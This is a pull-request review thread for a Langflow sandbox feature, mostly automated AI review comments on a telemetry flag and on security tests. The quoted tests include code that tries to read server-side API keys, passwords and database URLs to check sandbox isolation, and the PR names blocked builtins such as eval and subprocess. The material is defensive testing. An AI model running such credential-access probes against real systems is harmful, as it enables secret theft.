| "required": false, | ||
| "show": false, | ||
| "title_case": false, | ||
| "tool_mode": false, | ||
| "trace_as_metadata": true, | ||
| "track_in_telemetry": true, | ||
| "type": "bool", | ||
| "value": true | ||
| }, |
There was a problem hiding this comment.
Telemetry/privacy check for input_text flag.
The field tracks as telemetry. Ensure only the boolean is captured (no raw text) and that analytics pipelines don’t infer content from it. If uncertain, disable tracking.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2038 to 2056, the input_text field is currently configured to be
traced and tracked which risks leaking raw text; change configuration so only
the boolean value is recorded — set trace_as_metadata to false and
track_in_telemetry to false (or remove those flags) and verify no other
properties (placeholders, default value, or surrounding logic) send or derive
the original text to analytics; if you cannot guarantee analytics will only
receive a boolean, disable telemetry entirely for this field.
| server_api_key = "sk-secret-key-12345" | ||
| server_db_password = "db_password_secret" | ||
| server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"} |
There was a problem hiding this comment.
Fake API keys will trigger gitleaks and other secret scanners
The hard‑coded strings like:
server_api_key = "sk-secret-key-12345"(Line 29)self.api_key = "sk-secret-12345"(Line 63)
match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.
Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:
- server_api_key = "sk-secret-key-12345"
+ server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS"
@@
- self.api_key = "sk-secret-12345"
+ self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"or add explicit allowlist annotations consistent with your secret‑scanning configuration.
Also applies to: 63-66
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and
63-66, replace hard-coded strings that resemble real API keys (e.g. values with
sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference
test fixtures/env vars, or add an explicit secret-scan allowlist annotation per
our CI configuration; ensure new values do not match common API-key patterns
(avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer
simple labels such as "test-api-key-1" or read the value from a test-only
config/env var, updating tests accordingly.
| code = """ | ||
| def test(): | ||
| # Try to access server's Python variables containing secrets | ||
| # If isolation is broken, these would be accessible | ||
| return server_api_key, server_db_password, server_config | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server secrets are not accessible | ||
| # This is what prevents credential theft | ||
| with pytest.raises(NameError): | ||
| test_func() |
There was a problem hiding this comment.
🧩 Analysis chain
exec_globals["test"] never populated by execute_in_sandbox
All tests in this file follow the pattern:
exec_globals = {}execute_in_sandbox(code_obj, exec_globals)test_func = exec_globals["test"]with pytest.raises(NameError): test_func()
However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).
Two options:
- Adjust tests to assert on the exception raised by
execute_in_sandboxitself (and calltest()from within the code string), e.g.:
- code = """
-def test():
- # Try to access server's Python variables containing secrets
- # If isolation is broken, these would be accessible
- return server_api_key, server_db_password, server_config
-"""
+ code = """
+def test():
+ # Try to access server's Python variables containing secrets
+ # If isolation is broken, these would be accessible
+ return server_api_key, server_db_password, server_config
+
+# Call inside the sandbox so NameError is raised during execute_in_sandbox
+test()
+"""
@@
- code_obj = compile(code, "<test>", "exec")
- exec_globals = {}
-
- execute_in_sandbox(code_obj, exec_globals)
-
- # Call the function
- test_func = exec_globals["test"]
-
- # CRITICAL: Should raise NameError - server secrets are not accessible
- # This is what prevents credential theft
- with pytest.raises(NameError):
- test_func()
+ code_obj = compile(code, "<test>", "exec")
+ exec_globals = {}
+
+ # CRITICAL: Should raise NameError - server secrets are not accessible
+ # This is what prevents credential theft
+ with pytest.raises(NameError):
+ execute_in_sandbox(code_obj, exec_globals)- Or, if the intended contract is that sandboxed definitions are exported back into
exec_globals, updateexecute_in_sandboxto propagate selected names (e.g., functions) out of the internalsandbox_globalsintoexec_globals.
Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.
🏁 Script executed:
#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type pyLength of output: 114
🏁 Script executed:
#!/bin/bash
# Find where execute_in_sandbox is imported/used in test file
rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2Length of output: 1022
🏁 Script executed:
#!/bin/bash
# Get the full test file to understand structure
cat src/lfx/tests/unit/custom/test_sandbox_security.pyLength of output: 9640
🏁 Script executed:
#!/bin/bash
# Find all Python files that might contain execute_in_sandbox definition
fd -e py -x rg -l "def execute_in_sandbox" {} \;Length of output: 35
🏁 Script executed:
#!/bin/bash
# Search more broadly for execute_in_sandbox in the codebase
rg -n "execute_in_sandbox" --type py -C3Length of output: 12538
🏁 Script executed:
#!/bin/bash
# Get the execute_in_sandbox function implementation
sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 2584
🏁 Script executed:
#!/bin/bash
# Get full sandbox.py file for complete context
cat src/lfx/src/lfx/custom/sandbox.pyLength of output: 8824
Tests fail with KeyError before asserting intended NameError behavior
The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.
This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.
Choose one solution:
- Move the function call into the code string so
NameErroris raised duringexecute_in_sandbox:
code = """
def test():
return server_api_key, server_db_password, server_config
test()
"""
with pytest.raises(NameError):
execute_in_sandbox(code_obj, exec_globals)- Update
execute_in_sandboxto propagate selected definitions (e.g., functions) back intoexec_globalsafter execution.
There was a problem hiding this comment.
Should we make some of this lazy?
|
Converting to draft for now. Need to have a way to identify core components before this can be merged, otherwise core components with "dangerous" builtins will fail 1) Updates and 2) Check and Save (during validation). once we have a method to identify core components, we can also go ahead and add this isolation layer to execution. |
Allows users to specify configurable levels of security to block system-level access builtins and modules, such as
eval,subprocess, etc. Works during validation and during execution.Does not block builtins or modules in core (trusted) components.
Note that this isn't a true isolated sandbox - Python does not provide that capability. Python processes generally rely on containers and virtualization to enforce security.